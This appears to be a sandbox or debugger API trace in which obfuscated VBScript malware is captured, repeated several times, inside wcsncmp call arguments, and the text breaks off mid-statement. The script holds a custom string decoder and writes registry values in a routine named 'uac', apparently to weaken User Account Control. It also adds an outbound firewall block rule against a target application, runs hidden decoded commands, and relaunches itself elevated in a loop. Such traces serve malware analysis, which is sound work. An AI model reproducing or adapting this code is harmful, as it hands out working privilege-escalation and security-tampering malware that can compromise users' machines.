bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0226.294] wcsncmp (_String1="\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0226.294] wcsncmp (_String1="\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 81 [0226.295] wcsncmp (_String1="\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.295] wcsncmp (_String1="x = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = 